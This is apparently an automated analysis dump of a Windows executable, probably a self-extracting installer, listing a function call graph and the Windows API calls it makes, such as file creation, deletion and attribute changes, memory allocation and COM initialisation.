14177->14178 14179 403c60 14178->14179 14180 4014eb 2 API calls 14179->14180 14181 403c68 14180->14181 14182 4014eb 2 API calls 14181->14182 14183 403c70 14182->14183 14184 4014eb 2 API calls 14183->14184 14185 403c78 14184->14185 14222 403333 14185->14222 14188 403cc9 14191 403333 2 API calls 14188->14191 14189 403c89 7 API calls 14190 403e81 ??3@YAXPAX ??3@YAXPAX 14189->14190 14190->14166 14192 403cd3 14191->14192 14193 403333 2 API calls 14192->14193 14194 403cdd 14193->14194 14195 403333 2 API calls 14194->14195 14196 403ce7 14195->14196 14197 403333 2 API calls 14196->14197 14198 403cf1 14197->14198 14199 403333 2 API calls 14198->14199 14200 403cfb 14199->14200 14201 403333 2 API calls 14200->14201 14202 403d05 14201->14202 14203 403333 2 API calls 14202->14203 14204 403d0f _wtol 14203->14204 14205 403d21 14204->14205 14212 403d38 14204->14212 14209 401403 2 API calls 14205->14209 14206 401795 2 API calls 14207 403d5a 14206->14207 14208 403d75 14207->14208 14210 4014bc 2 API calls 14207->14210 14211 4039e7 88 API calls 14208->14211 14209->14212 14213 403d6b 14210->14213 14214 403d7d 14211->14214 14212->14206 14215 401795 2 API calls 14213->14215 14216 403e48 7 API calls 14214->14216 14217 4014bc 2 API calls 14214->14217 14215->14208 14216->14190 14218 403d92 14217->14218 14219 402ab8 2 API calls 14218->14219 14220 403d9f CoCreateInstance 14219->14220 14220->14216 14221 403dc1 14220->14221 14221->14216 14224 40334d 14222->14224 14223 403392 14223->14188 14223->14189 14224->14223 14225 401795 2 API calls 14224->14225 14225->14224 14226 41872c 14227 418737 14226->14227 14228 418748 14226->14228 14227->14228 14230 413880 14227->14230 14235 4075cb ResetEvent 14230->14235 14233 4075cb 2 API calls 14234 413899 14233->14234 14234->14227 14236 40751b GetLastError 14235->14236 14237 4075dd 14236->14237 14237->14233 10345 4120c0 10346 4120ce 10345->10346 10351 4120d8 10345->10351 10366 402a2f 10346->10366 10350 4120e2 10351->10350 10352 411f90 10351->10352 10359 413b69 10351->10359 10354 411fb6 10352->10354 10358 411fa0 10352->10358 10353 411fdb 10353->10351 10354->10353 10371 411000 10354->10371 10356 411fae 10356->10351 10358->10356 10374 411a40 10358->10374 10360 413ba9 10359->10360 10361 413b75 10359->10361 10360->10351 10361->10360 10386 415588 10361->10386 10392 41247f SetFileTime 10361->10392 10393 41229a 10361->10393 10396 4012ab 10361->10396 10745 4029c5 10366->10745 10369 402a3d 10369->10351 10370 402a3e VirtualAlloc 10370->10351 10379 410e70 memset 10371->10379 10376 411a5d 10374->10376 10375 411a7d 10375->10358 10376->10375 10381 4111d0 10376->10381 10378 411dfa 10378->10358 10380 410ecc 10379->10380 10380->10358 10382 4111f3 10381->10382 10383 410e70 memset 10382->10383 10384 411286 10382->10384 10385 41127e 10383->10385 10384->10378 10385->10378 10390 415594 10386->10390 10387 415641 10387->10361 10388 415549 106 API calls 10388->10390 10390->10387 10390->10388 10402 418eab 10390->10402 10406 415428 10390->10406 10392->10361 10394 4122a4 CloseHandle 10393->10394 10395 4122af 10393->10395 10394->10395 10395->10361 10397 4012bf 10396->10397 10400 4012b3 10396->10400 10398 4012dc 10397->10398 10741 41249c 10397->10741 10398->10400 10401 4012e9 SetFileAttributesW 10398->10401 10400->10361 10401->10400 10403 418ebc 10402->10403 10404 418ecc 10402->10404 10411 412ace 10403->10411 10404->10390 10407 415442 10406->10407 10423 412434 10407->10423 10426 401b0b 10407->10426 10408 415476 10408->10390 10416 4124ac 10411->10416 10413 412ae7 10419 4129fa 10413->10419 10415 412b06 10415->10404 10417 4124ba 10416->10417 10418 4124bd WriteFile 10416->10418 10417->10418 10418->10413 10420 412a01 10419->10420 10421 412a04 GetLastError 10419->10421 10420->10415 10422 412a0e 10421->10422 10422->10415 10487 41236b 10423->10487 10427 401b27 10426->10427 10432 401b1d 10426->10432 10428 401b54 10427->10428 10492 4014eb 10427->10492 10517 412574 10428->10517 10432->10408 10433 401e47 ??3@YAXPAX 10437 412574 VariantClear 10433->10437 10434 401b82 10495 401403 10434->10495 10437->10432 10438 401b8d 10499 4017c0 10438->10499 10442 401bac ??3@YAXPAX 10443 401e0d ??3@YAXPAX 10442->10443 10449 401bbe 10442->10449 10445 412574 VariantClear 10443->10445 10445->10432 10446 401bdf 10447 412574 VariantClear 10446->10447 10448 401be7 ??3@YAXPAX 10447->10448 10448->10428 10449->10446 10450 401c49 10449->10450 10451 401c0a 10449->10451 10454 401c87 10450->10454 10455 401c6e 10450->10455 10452 412574 VariantClear 10451->10452 10453 401c1c ??3@YAXPAX 10452->10453 10453->10428 10457 401ca9 GetLocalTime SystemTimeToFileTime 10454->10457 10458 401c8f 10454->10458 10456 412574 VariantClear 10455->10456 10459 401c76 ??3@YAXPAX 10456->10459 10457->10458 10458->10451 10460 401cc6 10458->10460 10461 401cdd 10458->10461 10459->10428 10521 4039e7 lstrlenW 10460->10521 10508 40367d GetFileAttributesW 10461->10508 10465 401e19 GetLastError 10465->10443 10466 401cfd ??2@YAPAXI 10468 401d09 10466->10468 10467 401e0f 10467->10465 10545 412468 10468->10545 10471 401df4 10474 412574 VariantClear 10471->10474 10472 401d44 GetLastError 10548 4013d1 10472->10548 10474->10443 10475 401d56 10476 4039e7 88 API calls 10475->10476 10479 401d64 ??3@YAXPAX 10475->10479 10477 401db1 10476->10477 10477->10479 10481 412468 2 API calls 10477->10481 10480 401d81 10479->10480 10482 412574 VariantClear 10480->10482 10484 401dd6 10481->10484 10483 401d8f ??3@YAXPAX 10482->10483 10483->10428 10485 401dda GetLastError 10484->10485 10486 401deb ??3@YAXPAX 10484->10486 10485->10479 10486->10471 10488 41229a CloseHandle 10487->10488 10489 412376 10488->10489 10490 41237a CreateFileW 10489->10490 10491 41239f 10489->10491 10490->10491 10491->10408 10551 4011b7 10492->10551 10496 40141a 10495->10496 10497 4011b7 2 API calls 10496->10497 10498 401425 10497->10498 10498->10438 10500 4013d1 2 API calls 10499->10500 10501 4017ce 10500->10501 10556 4014bc 10501->10556 10503 4017d9 10504 40143c 10503->10504 10505 401448 10504->10505 10507 40145a 10504->10507 10506 4011b7 2 API calls 10505->10506 10506->10507 10507->10442 10509 401ce9 10508->10509 10510 40369a 10508->10510 10509->10465 10509->10466 10509->10467 10511 4036ab 10510->10511 10512 40369e SetLastError 10510->10512 10511->10509 10513 4036b4 10511->10513 10515 4036c2 FindFirstFileW 10511->10515 10512->10509 10563 403650 10513->10563 10515->10513 10516 4036d5 FindClose CompareFileTime 10515->10516 10516->10509 10516->10513 10518 412530 10517->10518 10519 412568 10518->10519 10520 412551 VariantClear 10518->10520 10519->10432 10520->10432 10522 402a67 2 API calls 10521->10522 10523 403a08 10522->10523 10524 4011b7 2 API calls 10523->10524 10532 403a18 10523->10532 10524->10532 10526 403a66 GetSystemTimeAsFileTime GetFileAttributesW 10527 403a85 10526->10527 10528 403a7b 10526->10528 10531 401e6b 4 API calls 10527->10531 10535 403a8b ??3@YAXPAX 10527->10535 10530 40367d 22 API calls 10528->10530 10529 403b0a 10533 403b3a 10529->10533 10529->10535 10530->10527 10543 403a98 10531->10543 10532->10526 10532->10529 10612 401e6b CreateDirectoryW 10532->10612 10534 409606 57 API calls 10533->10534 10539 403b44 ??3@YAXPAX 10534->10539 10542 403b4f 10535->10542 10536 403a9d 10618 409606 10536->10618 10537 403ab0 memcpy 10537->10543 10538 403afe ??3@YAXPAX 10538->10542 10539->10542 10542->10451 10543->10536 10543->10537 10543->10538 10544 401e6b 4 API calls 10543->10544 10544->10543 10738 412451 10545->10738 10549 4011b7 2 API calls 10548->10549 10550 4013eb 10549->10550 10550->10475 10552 401203 10551->10552 10553 4011c5 ??2@YAPAXI 10551->10553 10552->10433 10552->10434 10553->10552 10554 4011e6 ??3@YAXPAX 10553->10554 10554->10552 10559 401472 10556->10559 10558 4014cc 10558->10503 10560 4014b6 10559->10560 10561 401486 10559->10561 10560->10558 10562 4011b7 2 API calls 10561->10562 10562->10560 10569 4032e9 10563->10569 10565 403659 10566 40367a 10565->10566 10567 40365e GetLastError 10565->10567 10566->10509 10568 403669 10567->10568 10568->10509 10570 4032f2 10569->10570 10571 4032f6 GetFileAttributesW 10569->10571 10570->10565 10572 403307 10571->10572 10573 40330c 10571->10573 10572->10565 10574 403310 SetFileAttributesW 10573->10574 10575 40332a 10573->10575 10577 403326 10574->10577 10578 40331d DeleteFileW 10574->10578 10580 4031dc 10575->10580 10577->10565 10578->10565 10601 402a67 10580->10601 10582 4031f3 10605 402ab8 10582->10605 10584 403200 FindFirstFileW 10585 4032b8 SetFileAttributesW 10584->10585 10599 403222 10584->10599 10587 4032c3 RemoveDirectoryW 10585->10587 10588 4032db ??3@YAXPAX 10585->10588 10586 401403 2 API calls 10586->10599 10587->10588 10589 4032d0 ??3@YAXPAX 10587->10589 10590 4032e3 10588->10590 10589->10590 10590->10565 10592 402ab8 2 API calls 10592->10599 10593 403252 lstrcmpW 10596 403268 lstrcmpW 10593->10596 10597 40329b FindNextFileW 10593->10597 10594 403287 SetFileAttributesW 10594->10588 10595 403290 DeleteFileW 10594->10595 10595->10599 10596->10597 10596->10599 10598 4032b1 FindClose 10597->10598 10597->10599 10598->10585 10599->10586 10599->10588 10599->10592 10599->10593 10599->10594 10599->10597 10600 4031dc 2 API calls 10599->10600 10609 401795 10599->10609 10600->10599 10602 402a7e 10601->10602 10603 4011b7 2 API calls 10602->10603 10604 402a89 10603->10604 10604->10582 10606 402ac5 10605->10606 10607 401472 2 API calls 10606->10607 10608 402ad0 10607->10608 10608->10584 10610 401472 2 API calls 10609->10610 10611 40179f 10610->10611 10611->10599 10613 401eac 10612->10613 10614 401e7c GetLastError 10612->10614 10613->10532 10615 401e96 GetFileAttributesW 10614->10615 10617 401e8b 10614->10617 10615->10613 10615->10617 10616 401e8c SetLastError 10616->10532 10617->10613 10617->10616 10629 40247d 10618->10629 10621 4096e9 10625 409522 27 API calls 10621->10625 10622 40963b GetLastError FormatMessageW 10623 409669 FormatMessageW 10622->10623 10624 40967e lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 10622->10624 10623->10621 10623->10624 10649 409522 10624->10649 10627 4096f5 10625->10627 10627->10535 10630 402494 10629->10630 10631 4024c5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 10630->10631 10632 4024bb wvsprintfW 10630->10632 10633 402575 SetLastError 10631->10633 10634 4024fd ??2@YAPAXI GetEnvironmentVariableW 10631->10634 10632->10621 10632->10622 10633->10632 10638 40258c 10633->10638 10635 40252c GetLastError 10634->10635 10648 40255e ??3@YAXPAX 10634->10648 10639 402532 10635->10639 10635->10648 10637 4025ab lstrlenA ??2@YAPAXI 10642 402616 MultiByteToWideChar 10637->10642 10643 4025dc GetLocaleInfoW 10637->10643 10638->10637 10659 402427 10638->10659 10640 402561 10639->10640 10644 40253c lstrcmpiW 10639->10644 10640->10633 10642->10632 10643->10642 10646 402603 _wtol 10643->10646 10647 40254b ??3@YAXPAX 10644->10647 10644->10648 10645 4025a1 10645->10637 10646->10642 10647->10640 10648->10640 10650 409531 10649->10650 10651 409597 ??3@YAXPAX LocalFree 10649->10651 10666 4083ea 10650->10666 10651->10627 10654 409569 10671 40844b 10654->10671 10655 409557 IsBadReadPtr 10655->10654 10660 402431 GetUserDefaultUILanguage 10659->10660 10661 402475 10659->10661 10662 402452 GetSystemDefaultUILanguage 10660->10662 10663 40244e 10660->10663 10661->10645 10662->10661 10664 40245e GetSystemDefaultLCID 10662->10664 10663->10645 10664->10661 10665 40246e 10664->10665 10665->10661 10667 4014eb 2 API calls 10666->10667 10668 4083fb 10667->10668 10669 408447 IsWindow 10668->10669 10670 408423 GetSystemMetrics GetSystemMetrics 10668->10670 10669->10654 10669->10655 10670->10669 10672 40845a 10671->10672 10673 4084be 10671->10673 10672->10673 10674 402a67 2 API calls 10672->10674 10683 4081be ??3@YAXPAX 10673->10683 10675 40846b 10674->10675 10676 402a67 2 API calls 10675->10676 10677 408476 10676->10677 10684 4044e2 10677->10684 10680 4044e2 20 API calls 10681 408488 ??3@YAXPAX ??3@YAXPAX 10680->10681 10681->10673 10683->10651 10691 402e67 10684->10691 10688 4044fa 10727 4044ae 10688->10727 10692 4014eb ??2@YAPAXI ??3@YAXPAX 10691->10692 10693 402e75 10692->10693 10694 402e85 ExpandEnvironmentStringsW 10693->10694 10695 4011b7 ??2@YAPAXI ??3@YAXPAX 10693->10695 10696 402ea9 10694->10696 10697 402e9e ??3@YAXPAX 10694->10697 10695->10694 10698 402aa0 ??2@YAPAXI ??3@YAXPAX 10696->10698 10699 402ee0 10697->10699 10700 402eb7 ExpandEnvironmentStringsW 10698->10700 10704 4041b2 10699->10704 10701 402ec4 10700->10701 10702 40143c ??2@YAPAXI ??3@YAXPAX 10701->10702 10703 402ed8 ??3@YAXPAX 10702->10703 10703->10699 10705 4014eb ??2@YAPAXI ??3@YAXPAX 10704->10705 10706 4041c0 10705->10706 10707 40143c ??2@YAPAXI ??3@YAXPAX 10706->10707 10708 4041cb 10707->10708 10709 402ab8 ??2@YAPAXI ??3@YAXPAX 10708->10709 10710 4041d8 10709->10710 10711 402a67 ??2@YAPAXI ??3@YAXPAX 10710->10711 10712 4041e5 10711->10712 10713 404137 ??2@YAPAXI ??3@YAXPAX memmove 10712->10713 10714 4041f5 ??3@YAXPAX 10713->10714 10715 40143c ??2@YAPAXI ??3@YAXPAX 10714->10715 10716 404209 10715->10716 10717 402ab8 ??2@YAPAXI ??3@YAXPAX 10716->10717 10718 404216 10717->10718 10719 402a67 ??2@YAPAXI ??3@YAXPAX 10718->10719 10720 404223 10719->10720 10721 404137 ??2@YAPAXI ??3@YAXPAX memmove 10720->10721 10722 404233 ??3@YAXPAX 10721->10722 10723 402a67 ??2@YAPAXI ??3@YAXPAX 10722->10723 10724 40424a 10723->10724 10725 404137 ??2@YAPAXI ??3@YAXPAX memmove 10724->10725 10726 404259 ??3@YAXPAX ??3@YAXPAX 10725->10726 10726->10688 10728 402e67 6 API calls 10727->10728 10729 4044b9 10728->10729 10730 40426d 7 API calls 10729->10730 10731 4044c6 10730->10731 10732 404328 7 API calls 10731->10732 10733 4044d1 10732->10733 10734 4043e3 ??2@YAPAXI ??3@YAXPAX memmove ??3@YAXPAX 10733->10734 10735 4044d7 10734->10735 10736 402e67 6 API calls 10735->10736 10737 4044dd 10736->10737 10737->10680 10739 412434 2 API calls 10738->10739 10740 401d3c 10739->10740 10740->10471 10740->10472 10744 41247f SetFileTime 10741->10744 10743 4124a9 10743->10398 10744->10743 10746 4029d5 10745->10746 10752 4029d1 10745->10752 10747 4029e5 GlobalMemoryStatusEx 10746->10747 10746->10752 10748 4029f3 10747->10748 10747->10752 10749 40247d 19 API calls 10748->10749 10748->10752 10750 402a0d 10749->10750 10753 409599 10750->10753 10752->10369 10752->10370 10754 4083ea 4 API calls 10753->10754 10755 4095a7 IsWindow 10754->10755 10756 4095d0 10755->10756 10757 4095be IsBadReadPtr 10755->10757 10758 40844b 22 API calls 10756->10758 10757->10756 10759 4095f7 10758->10759 10762 4081be ??3@YAXPAX 10759->10762 10761 409601 10761->10752 10762->10761 12694 414dcf _EH_prolog 12705 414e02 12694->12705 12695 414f2f 12725 40122a 12695->12725 12697 414f44 12739 414b2d 12697->12739 12698 414f59 12701 414f66 ??2@YAPAXI 12698->12701 12699 414be8 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 12699->12705 12716 414f80 12701->12716 12702 414da5 8 API calls 12702->12705 12703 414b0b 4 API calls 12703->12705 12704 412885 VirtualFree ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ctype 12704->12705 12705->12695 12705->12699 12705->12702 12705->12703 12705->12704 12706 414cbf _CxxThrowException 12705->12706 12715 414e24 12705->12715 12706->12705 12707 414fca 12709 414c38 3 API calls 12707->12709 12708 41502d ??2@YAPAXI 12708->12716 12712 414fe2 12709->12712 12710 414c38 3 API calls 12710->12716 12713 414b2d ctype 3 API calls 12712->12713 12713->12715 12714 414b2d ctype 3 API calls 12714->12716 12716->12707 12716->12708 12716->12710 12716->12714 12716->12715 12721 414491 152 API calls 12716->12721 12722 4150aa 12716->12722 12735 4156e6 12716->12735 12742 415346 ??2@YAPAXI 12716->12742 12744 415693 12716->12744 12718 414c38 3 API calls 12719 4150cf 12718->12719 12720 414b2d ctype 3 API calls 12719->12720 12720->12715 12721->12716 12722->12718 12726 401238 GetDiskFreeSpaceExW 12725->12726 12727 40128e SendMessageW 12725->12727 12726->12727 12728 401250 12726->12728 12733 401276 12727->12733 12728->12727 12729 40247d 19 API calls 12728->12729 12730 401269 12729->12730 12731 409599 27 API calls 12730->12731 12732 40126f 12731->12732 12732->12733 12734 401287 12732->12734 12733->12697 12733->12698 12734->12727 12736 41570f 12735->12736 12748 415549 12736->12748 12740 4127e6 ctype 3 API calls 12739->12740 12741 414b3b 12740->12741 12743 415378 12742->12743 12743->12716 12746 415698 12744->12746 12745 4156bf 12745->12716 12746->12745 12747 415428 106 API calls 12746->12747 12747->12746 12751 41554e 12748->12751 12749 415584 12749->12716 12750 415428 106 API calls 12750->12751 12751->12749 12751->12750 12752 4017de 12753 4017fb 12752->12753 12754 4017eb 12752->12754 12757 40175a ??3@YAXPAX 12754->12757 12758 401773 ??3@YAXPAX 12757->12758 12759 40176d 12757->12759 12760 401783 ??3@YAXPAX 12758->12760 12759->12758 12760->12753 10342 4123f1 ReadFile 13789 419c90 13794 407613 InitializeCriticalSection 13789->13794 13791 419c9a 13792 4192a8 2 API calls 13791->13792 13793 419ca4 13792->13793 13794->13791 10763 401198 SysAllocString 14770 404ba6 14774 404bbb 14770->14774 14771 404be9 14772 412833 memmove 14771->14772 14773 404bf7 14772->14773 14774->14771 14777 402990 ??3@YAXPAX ??3@YAXPAX 14774->14777 14776 404bda ??3@YAXPAX 14776->14774 14777->14776 14820 4015ac 14821 401556 6 API calls 14820->14821 14822 4015b9 14821->14822 14824 4015bd 14822->14824 14825 401198 SysAllocString 14822->14825 14825->14824
                                                                                                                                        APIs
                                                                                                                                        • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405C0F
                                                                                                                                          • Part of subcall function 00402017: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                                                                                          • Part of subcall function 00402017: CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                                                                                          • Part of subcall function 00402017: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                                                                                          • Part of subcall function 00402017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                                                                                          • Part of subcall function 00402017: DispatchMessageW.USER32(?), ref: 00402069
                                                                                                                                          • Part of subcall function 00402017: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                                                                                          • Part of subcall function 00402017: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                                                                                        • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405C2C
                                                                                                                                        • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 00405CBB
                                                                                                                                          • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                                                                                          • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                                                                                          • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                                                                                          • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405CE6
                                                                                                                                          • Part of subcall function 00404D0B: #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                                                                                          • Part of subcall function 00404D0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                                                                                          • Part of subcall function 00404D0B: wsprintfW.USER32 ref: 00404DB8
                                                                                                                                        • wsprintfW.USER32 ref: 00405D45
                                                                                                                                        • _wtol.MSVCRT ref: 00405D7F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DCE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DE2
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,0041EA30), ref: 00405DEA
                                                                                                                                          • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                          • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000208), ref: 00405E61
                                                                                                                                        • _wtol.MSVCRT ref: 00405F89
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,0041EA30,0041EA30), ref: 00406118
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,0041EA30,0041EA30), ref: 0040619B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041EA30,0041EA30), ref: 00406211
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 0040622D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041EA30,0041EA30), ref: 0040626B
                                                                                                                                        • wsprintfW.USER32 ref: 00406295
                                                                                                                                        • _wtol.MSVCRT ref: 004064B6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00406587
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004065D4
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 004065DC
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 004065FB
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406653
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 0040665B
                                                                                                                                        • GetCommandLineW.KERNEL32(?,00000000,?,?), ref: 004066C3
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040673B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00406743
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040674B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00406753
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040675B
                                                                                                                                        • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 00406767
                                                                                                                                        • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0040676E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040678A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00406792
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040679A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067A2
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004067BE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004067C6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067CE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067D6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,00000000,?,?), ref: 0040687F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00000000,?,?), ref: 004068A4
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?), ref: 00406916
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00406937
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00406991
                                                                                                                                        • _wtol.MSVCRT ref: 00406A68
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406A8B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00406AC4
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 00406B1B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406C59
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406C67
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C92
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C9A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406CB6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406CBE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00406CEE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D2E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D97
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0041E9E8), ref: 00406D9F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E64
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E6F
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E79
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F33
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F3B
                                                                                                                                        • _wtol.MSVCRT ref: 00406FCF
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 004071AE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,?,?,?,?), ref: 004071B6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004071DA
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407223
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040722B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407233
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407239
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407249
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407251
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040726E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407276
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040727E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407286
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040728E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041E9E8), ref: 004072AF
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041E9E8), ref: 004072B7
